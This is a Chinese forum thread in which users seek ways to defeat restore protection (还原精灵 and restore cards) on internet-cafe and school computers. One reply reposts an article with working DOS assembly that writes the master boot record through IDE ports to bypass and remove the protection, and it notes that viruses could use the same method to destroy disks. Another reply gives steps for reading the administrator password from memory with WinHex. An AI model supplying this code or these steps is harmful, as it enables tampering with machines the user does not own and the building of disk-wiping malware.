|
作者: ywy2008 [ywy2008] 论坛用户 | 登录 |
本人经常在网吧!下载一些东东。可是那个网吧有还原精灵,我也从找过很多软件但是,一无所获呀!不知道有那位哥哥可以指教。小弟在此谢谢了。 联系QQ:8855251 |
地主 发表时间: 11/18 17:36 |
回复: peng_007 [peng_007] 论坛用户 | 登录 |
朋友你呀~!我可以告诉你一个方法~就是在线破解 去 http://www.cy07.com/这个网站就行了~ 看看还原精灵是几点几的版本 就行了 网站有个再线破解你一看就知道了 |
B1层 发表时间: 11/18 19:32 |
回复: newmyth21 [newmyth21] 论坛用户 | 登录 |
楼上的,你认为那个网站有用吗,我晕? 破解还原精灵应该用winhex。 |
B2层 发表时间: 11/19 01:42 |
回复: zhuyaping [zhuyaping] 论坛用户 | 登录 |
不过也不一定因为这个软件不是专业破解软件! |
B3层 发表时间: 11/19 08:55 |
回复: xiaoyouzhe [xiaoyouzhe] 论坛用户 | 登录 |
我在的网吧就装有还原精灵,我想了很多办法的没折,我找到只有打开还原精灵 更改密码对话框,按读取密码就可以。 |
B4层 发表时间: 11/20 15:35 |
回复: wuyalei [wuyalei] 论坛用户 | 登录 |
我想把我们学校机子上的还原精灵破戒到` 但是学校里装的是还原卡````请问怎么破啊```` 还有就是`学校的机子上的还原精灵隐藏起来了 我找到`怎么问怎么找啊 |
B5层 发表时间: 11/20 17:31 |
回复: chang_hui [chang_hui] 论坛用户 | 登录 |
在关机的时候按着SHIFT键就可以了,这样可以使还原精灵不还原了 |
B6层 发表时间: 04-01-07 03:25 |
回复: zje [zje] 论坛用户 | 登录 |
楼上的方法不管用!!! |
B7层 发表时间: 04-01-10 14:07 |
回复: wenjianxin [wenjianxin] 论坛用户 | 登录 |
如果你想破解还原卡的话可以将卡直接取出,执行PASSWORD后按F5键将系统密码清除为直接回车就行啦 |
B8层 发表时间: 04-01-11 11:55 |
回复: xnnyga [xnnyga] 论坛用户 | 登录 |
如果是还原卡的话~~你可以在安全模式下把他删了啊~~他就不会动作了啊 |
B9层 发表时间: 04-01-11 12:14 |
回复: cg2327 [cg2327] | 登录 |
还有理好的哟!!一种可以穿透还原卡和还原软件的代码
www.hacker.com.cn 黑客防线 还原卡和还原软件被广泛运用于各种公共场合的电脑上,比如学校机房和网吧。这些还原卡 和还原软件(以下我简称为虚拟还原技术)能够记录下一切对硬盘的写操作,不论您对硬盘进 行拷贝还是移动删除甚至是格式化分区等操作,只要一重新启动,一切都会恢复到这个操作之 前的情况,因此有些虚拟还原厂商还会在广告词中加上一句“可以防范一切电脑病毒”。这种 虚拟还原的方法在大部分时候的确可以对公共机房的电脑起到很好的保护作用,难道真的没有 一种方法能够穿透这种保护机制么?答案是否定的,下面请听我一一道来。 一、虚拟还原技术的原理 本文所说的是一种普遍运用于还原卡或还原软件上的技术,当然,不同品牌不同厂商生产的 可能不尽相同,但原理却是相通的。 首先,还原卡和还原软件会抢先夺取引导权,将原来的0头0道1扇保存在一个其他的扇区,( 具体备份到那个扇区是不一定的),将自己的代码写入0头0道1扇,从而能在操作系统之前得 到执行权,这一点类似于一个引导型病毒;然后,我们来看看虚拟还原技术在操作系统之前都 做了些什么: 1.将中断向量表中的INT13H的入口地址保存; 2.把自己用于代替INT13H的代码写入内存,并记住入口地址,当然这种“写入内存”并不是 普通的“写”,而是一种我们称为“常驻”的方法,有关“常驻程序”的实现方法我们不另外 花篇幅来描述了,如果你还不了解的话请自己找有关资料,也可以到www.hackart.org或www .lsky.net找风般的男人交流; 3.将中断向量表中INT13H的入口地址改为这段常驻程序的入口地址。补充一点,虚拟还原程 序在修改INT13H的入口后往往都会修改一些其他中断入口,当然也是通过常驻程序来实现的, 这些中断用来实现对中断向量表中INT13H入口地址监控,一旦发现被修改,就马上把它改回, 这样做同样是用来防止被有心人破解。 好了,你已经看出来了,这段用来替代BIOS提供的INT13H的代码才是虚拟还原技术的关键, 那么这段代码到底实现了些什么了,以下是本人对此拙浅的理解: 1.拦截所有INT13H中对硬盘0头0道1扇的操作 这些包括读写操作,把所有的对0头0道1扇的操作改为对虚拟还原程序备份的那个扇区的操作 ,这样做的目的是保护虚拟还原代码不被破坏,并且不能被有心人读出进行破解,即使你用扇 区编辑工具查看主引导区,实际上你看到的是这个备份的主引导区。 2.拦截所有INT13H中的写硬盘操作 这里包括对8G以下的硬盘的普通通过磁头、磁道、扇区定位的INT13H中的写操作,和扩? �INT13H中基于扇区地址方式的对大硬盘的写操作,甚至包括扩展INT13H中对一些非IDE接口的硬 盘的写操作。 至于拦截后做什么是虚拟还原技术实现的关键,在早期的DOS系统当中完全可以“什么都不做 ”,也就是说当用户写硬盘时实际上是什么都没做,但现在的操作系统都要对硬盘进行一些必 要的写操作,比如对虚拟内存的写操作。众所周知,虚拟内存实际上就是硬盘,而如果禁止操 作系统写硬盘的话显然后果是不堪设想的。所以,大多数虚拟还原厂商用的方法是占用一些硬 盘空间,把硬盘所进行的写操作做一个记录,等系统重新启动后还原这一记录,但是怎样科学 记录硬盘的写操作,是我一直没想通的问题,这种“科学”应该体现在时间上和硬盘空间的占 用量上的,也就是说怎么样用最少的时间和最少的硬盘空间来记录硬盘的写操作是实现关键, 如果有这方面想法的朋友欢迎和我交流; 3.备份端口70H,71H中的内容,并把最后一次执行时端口70H,71H的内容和备份的内容做比 较,不一样就提示BIOS被修改,是否还原,并通过密码验证修改BIOS是否合法。 二、PC机的中断机制 中断提供了最基本的硬件和软件的接口,它使得程序员不必了解硬件系统的细节,只要直接 调用系统提供的中断服务子程序,就可以完成相应功能,这样能使得程序设计更为方便。其实 现机制如下:当某一中断源发出中断请求时,CPU能够决定是否响应这一中断请求(当CPU在执 行更为重要的工作时,可以暂不响应),如果允许响应该中断,CPU会在现行的指令执行完后 ,把断点处的下一条指令地址和各寄存器的内容和标志位的状态,推入堆栈进行保护,然后转 到中断源服务程序的入口,进行中断处理,当中断处理完成后,再恢复被保留的各寄存器、标 志位状态和指令指针,使CPU返回断点,继续执行下一条指令。 为了区别各个中断,CPC系统给每个中断都分配了一个中断号N,比如INT 3H是断点中断? �INT 10H是显示中断,我们今天要讨论的主要是INT 13H磁盘读写中断。 要说清楚PC机上的中断机制,用这一点篇幅是完全不够的,这里我所说的只是一个大概,如 果你不清楚的话,请查阅一些资料或和我交流,我们今天重要要说的就是以INT13H为例看? �BIOS提供给我们的中断到底都是在做什么?所谓BIOS中断简单说就是你机器上的BIOS提供的中 断,那么在BIOS中断的后面,到底是些什么呢?实际上是一些对端口的输入输出操作,PC的每 个端口都实现特定的功能,我们完全可以不调用BIOS提供的中断而直接用输入输出指令对这些 端口进行操作,从而可以实现象调用BIOS中断一样的功能,但是一个前提是你必须对这些端口 有详细的了解。反过来说,PC的中断系统的一大好处就是能够让程序员无须了解系统底层的硬 件知识的而能够编程,从这点看,中断有点象我们平时所说的“封装”,我不知道这样说对不 对,但的确中断为我们“封装”了许多系统底层的细节。 三、硬盘读写端口的具体含义 对硬盘进行操作的常用端口是1f0h~1f7h号端口,各端口含义如下: 端口号 读还是写 具体含义 1F0H 读/写 用来传送读/写的数据(其内容是正在传输的一个字节的数据) 1F1H 读 用来读取错误码 1F2H 读/写 用来放入要读写的扇区数量 1F3H 读/写 用来放入要读写的扇区号码 1F4H 读/写 用来存放读写柱面的低8位字节 1F5H 读/写 用来存放读写柱面的高2位字节(其高6位恒为0) 1F6H 读/写 用来存放要读/写的磁盘号及磁头号 第7位 恒为1 第6位 恒为0 第5位 恒为1 第4位 为0代表第一块硬盘、为1代表第二块硬盘 第3~0位 用来存放要读/写的磁头号 1f7H 读 用来存放读操作后的状态 第7位 控制器忙碌 第6位 磁盘驱动器准备好了 第5位 写入错误 第4位 搜索完成 第3位 为1时扇区缓冲区没有准备好 第2位 是否正确读取磁盘数据 第1位 磁盘每转一周将此位设为1, 第0位 之前的命令因发生错误而结束 写 该位端口为命令端口,用来发出指定命令 为50h 格式化磁道 为20h 尝试读取扇区 为21h 无须验证扇区是否准备好而直接读扇区 为22h 尝试读取长扇区(用于早期的硬盘,每扇可能不是512字节,而是128字节到1024之间的值 ) 为23h 无须验证扇区是否准备好而直接读长扇区 为30h 尝试写扇区 为31h 无须验证扇区是否准备好而直接写扇区 为32h 尝试写长扇区 为33h 无须验证扇区是否准备好而直接写长扇区 注:当然看完这个表你会发现,这种读写端口的方法其实是基于磁头、柱面、扇区的硬盘读写 方法,不过大于8G的硬盘的读写方法也是通过端口1F0H~1F7H来实现的^_^ 四、一个通过对硬盘输入输出端口操作来读写硬盘的实例 让我们来看一个关于INT13H读写硬盘程序实例。在例子中详细说明了硬盘的读写操作所用到 的端口,并且把通过INT13H读出的主引导区得到的数据和通过输入输出读主引导区得到的数据 进行比较,从而证实这两种操作功能相同,程序片段如下: mov dx,1f6h ; 要读入的磁盘号及磁头号 mov al,0a0h ;磁盘0,磁头0 out dx,al mov dx,1f2h ;要读入的扇区数量 mov al,1 ;读一个扇区 out dx,al mov dx,1f3h ;要读的扇区号 mov al,1 ;扇区号为1 out dx,al mov dx,1f4h ;要读的柱面的低8位 mov al,0 ; 柱面低8位为0 out dx,al mov dx,1f5h ; 柱面高2位 mov al,0 ; 柱面高2位为0(通过1F4H和1F5H端口我们可以确定 ; 用来读的柱面号是0) out dx,al mov dx,1f7h ;命令端口 mov al,20h ; 尝试读取扇区 out dx,al still_going: in al,dx test al,8 ;扇区缓冲是否准备好 jz still_going ;如果扇区缓冲没有准备好的话则跳转,直到准备好才向下执行。 mov cx,512/2 ;设置循环次数(512/2次) mov di,offset buffer mov dx,1f0h ;将要传输的一个字节的数据 rep insw ;传输数据 ; ------ mov ax,201h ;以下是用INT13H读硬盘的0磁头、0柱面、1扇区 mov dx,80h mov cx,1 mov bx,offset buffer2 int 13h mov cx,512 ;以下部分用来比较2种方法读出的硬盘数据 mov si,offset buffer mov di,offset buffer2 repe cmpsb jne failure mov ah,9 mov dx,offset readmsg int 21h jmp good_exit failure: mov ah,9 mov dx,offset failmsg int 21h good_exit: ;以下部分用来结束程序 mov ax,4c00h ;退出程序 int 21h readmsg db 'The buffers match. Hard disk read using ports.$' failmsg db 'The buffers do not match.$' buffer db 512 dup ('V') buffer2 db 512 dup ('L') 五、可以穿透还原卡或是还原软件保护的代码 你可以对照硬盘读写端口含义表,再好好看看上面的例子,你将会对硬盘读写端口有一个比较 深的理解。好了,到了该把谜底揭晓的时候了,重新回到我们的主题。正如你现在想象的,这 种可以穿透还原卡或是还原软件保护的代码的确是对硬盘读写端口的输入输出操作。现在,我 们已经可以从原理上理解了,还原卡拦截的是中断操作,但却拦截不了输入输出操作,而用输 入输出操作足够可以对硬盘进行写操作了,当然用输入输出操作也完全可以读到被虚拟还原程 序屏蔽的关键部分,被还原卡或是还原软件屏蔽的0头0道1扇。知道了这一原理以后,可能是 仁者见仁智者见智的,如果你是一个虚拟还原技术的破解者、一个病毒制造者,或是虚拟还原 技术的设计者,往往对此的理解都是不尽相同的。 在此强调我不赞成制造病毒,但一个病毒制造者完全可以用此原理写出一个可以实现破坏装 有还原卡或还原软件的机器了,所以我要提醒虚拟还原用户的是,不要以为装有还原卡或是还 原软件就掉以轻心,要知道世界上还是有病毒能够穿透虚拟还原技术的保护,达到破坏硬盘的 目的的,想象一下如果把这一原理运用到CIH病毒中,或者运用到硬盘杀手病毒中,其后果是 不堪设想的。 谈谈如何用这种可以穿透虚拟还原技术的代码来破解还原软件(如还原精灵)吧。以下是我 写的用来测试破解还原精灵的代码,本代码编译后的程序需要在纯DOS环境执行,在DOS下我用 这段代码成功的把还原精灵给卸载了。 .286 CODE SEGMENT ASSUME CS:CODE,DS:code,ES:code START: ;---------------------------------------------------------- ;以下代码用INT13H读主引导区 mov ax,0201h mov dx,0080h mov cx,0001h mov bx,7c00h int 13h ;--------------------------------------------------------- ;以下代码用I/O端口来写主引导区 mov dx,1f6h ; 要读入的磁盘号及磁头号 mov al,0a0h ; 磁盘0,磁头0 out dx,al mov dx,1f2h ; 要写的扇区数量 mov al,1 ; 写一个扇区 out dx,al mov dx,1f3h ;要写的扇区号 mov al,1 ;写到1扇区 out dx,al mov dx,1f4h ; 要写的柱面的低8位 mov al,0 ; 低8位为0 out dx,al mov dx,1f5h ; 要写的柱面的高2位 mov al,0 ; 高2位为0 out dx,al mov dx,1f7h ;命令端口 mov al,30h ;尝试着写扇区. out dx,al oogle: in al,dx test al,8 ;磁盘扇区缓冲是否准备好 jz oogle mov cx,512/2 ;设置循环次数(512/2) mov si,7c00h mov dx,1f0h ;数据端口,用来存放要发送的数据. rep outsw ;发送数据. ; ------------------------------------------------------------------------------ ;退出程序 mov ah,4ch int 21 CODE ENDS END START 上面的程序非常简单,说明如下: 1、先把被还原精灵备份的原来的主引导区用INT13H读出来,这里虽然是对0头0道1扇进行读 操作,但实际上是在读被还原精灵把原来的主引导区备份进去的那个扇区; 2、把读出的原来的主引导区通过输入输出操作写进真正的主引导区,换句话说就是把还原精 灵给彻底删除了,此时重新启动你将发现还原精灵已经没有了。 我写了个FORWIN98/NT/XP的卸载还原精灵等软件的程序,大家可到www.lsky.net下载,不过 已经有人先我一步了,那就是网吧终结者出的一个清MBR的程序,我试了一下,发现的确有用 ,我还没有仔细分析该程序,但我敢肯定其原理差不多。那个程序写得不错,不过我认为有一 点需要改进,我的硬盘的MBR程序是我自己写的,用来实现多引导操作,当我执行完该清MBR程 序后,我的多引导代码就没了,我觉得此程序如果能把核心代码部分改成象我以上的代码,在 还原精灵下是把装还原精灵之前的MBR写回到主引导区,即使没装还原精灵的硬盘也只是把主 引导区写回主引导区,就没有任何的危险了。 用以上的方法要实现还原卡的破解可能是不行的,因为还原卡毕竟是硬件,它可以先于硬盘 引导前执行,这样即使你写回了硬盘的主引导区,还原卡还是可以把它写回的,但是,在破解 还原卡的时候,完全可以利用文章中的原理,把还原卡写入硬盘主引导区的真正代码读出进行 分析,甚至有些还原卡的密码就在这个扇区中。 对于还原卡和还原软件的制造者来说,如何让您制造的还原卡或还原软件更安全,可能是一 个需要思考的问题。真心希望以后的还原卡或是还原软件在拦截INT13H的同时也能拦截硬盘I /O操作。 在我安装还原精灵的时候看到一个选项是“防止硬盘I/O破坏”,开始还以为还原精灵在这方 面做的不错,想到了从拦截I/O操作来保护硬盘。可惜我错了,即使选择这一个选项,也同样 可以通过输入输出端口操作来写硬盘。对于掌握了这种技术的人来说,这种还原卡或是还原软 件可以说是形同虚设。因此我认为,还原卡和还原软件不但要实现拦截所有硬盘写操作、拦截 对主引导区的读写操作,更应该拦截对硬盘的读写端口的操作,只有这样的虚拟还原技术才可 能使基于硬盘的读写端口操作所对硬盘的破坏或是对虚拟还原技术的破解变成不可能。 原作者: 风般的男人 来 源: 安全焦点 提 交:ibicp 共有2239位读者阅读过此文 【告诉好友】 上篇文章:玩转freebsd内核模块 下篇文章:用户发现PTC软件的时间缺陷 PTC公司及时亡羊补牢 □- 本周热门文章 □- 相关文章 1.Windows XP系统登录密码丢失...[5125] 2.Netbios详谈[2657] 3.怎样发现Cisco路由器[2542] 4.在3389中监视、控制另一个用户的会...[2027] 5.我国军方将研制出国产 “Window...[1881] 6.防止内部攻击排除网管密码安全隐患[1405] 7.清华得实简介[629] 专家发现新病毒包 利用PayPal通过邮件传播 亚洲对网络依赖增强 安全防护的重要性提高 04年网络安全趋向更多更经常恶意代码 Unix系统出严重漏洞 惠普发补丁修复Tru64 Debian FSP工具安全漏洞 ISC INN控制消息处理缓冲区溢出漏洞 HD Soft Windows FTP Server用户名格式串处理漏洞 Hacker.com.cn 版权所有 请访问http://www.hacker.com |
B10层 发表时间: 04-02-01 18:54 |
回复: afan271314 [afan271314] 论坛用户 | 登录 |
还原卡 可以在安全模式下删????这可能吗 晕 |
B11层 发表时间: 04-02-01 19:16 |
回复: yimarong [yimarong] 版主 | 登录 |
建议向前多翻几页! |
B12层 发表时间: 04-02-02 17:55 |
回复: NetPolaris [newmyth21] 论坛用户 | 登录 |
打开Winhex10.0,先不管,然后右键单击右下角的还原精灵图标,点击"设定参数",点击"更改密",然后出现一对话框,请输入旧密码--填ZSH(随便填),请输入新密码--009web(随便填),请确认新密码--009web(确认)。再点击确定,下面出现两种情况:①提示框:密码更改成功,请记住新密码。②提示框:旧密码不正确。密码的字母必须使用正确的大小写。请确认是否因疏忽而按下了Caps Lock。当然第一种可能性不大,这儿也不说了。第二种情况:不要点击确定,这时打开Winhex10.0,点击"打开RAM(R)"或,双击"Hddgmon",双击"主要内存",然后点击"寻找文字",查找"009web",确定,COOL! 搞定。密码是明文的,破解完毕。 注意:有时候管理员会用到ASCII码,看到前面的ASCII值,然后查表即可得到结果 |
B13层 发表时间: 04-02-02 19:06 |
回复: wyjwyjzjzj [wyjwyjzjzj] 论坛用户 | 登录 |
B10写的懂了点上面的,下面~~~~~~~ 你下个一样的还原软件把原来的覆盖了看下行不 多数网吧专用软件可以用同理 |
B14层 发表时间: 04-02-02 23:10 |
回复: NetPolaris [newmyth21] 论坛用户 | 登录 |
问题已有给论,大家不用再顶了。 |
B15层 发表时间: 04-02-04 02:14 |
回复: l_w_p [l_w_p] 论坛用户 | 登录 |
上几中方法有点危险哦,要让老板发现了,可就吃不了兜着走吧!支持那位去WWW。CY07。COM网站的朋友,里边有个“在线破解还原精灵密码”的工具不错,试试吧!! |
B16层 发表时间: 04-02-04 10:54 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号